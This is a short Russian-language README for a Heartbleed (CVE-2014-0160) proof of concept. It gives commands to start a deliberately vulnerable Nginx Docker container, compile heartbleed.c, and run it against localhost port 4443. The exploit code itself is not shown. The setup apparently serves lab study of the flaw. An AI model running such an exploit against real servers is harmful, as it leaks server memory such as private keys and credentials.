
CVE-2014-0160 OpenSSL Heartbleed: доказательство концепции
CVE-2014-0160 OpenSSL Heartbleed — доказательство концепции
Загрузите и запустите Docker-контейнер (уязвимый сервер Nginx)
docker run -p 4443:443 -it --rm --name hb gescobero/heartbleed:1.0
Скомпилируйте атаку Heartbleed
gcc heartbleed.c -o heartbleed
Выполните её, указав сервер Nginx в качестве цели
./heartbleed 127.0.0.1 4443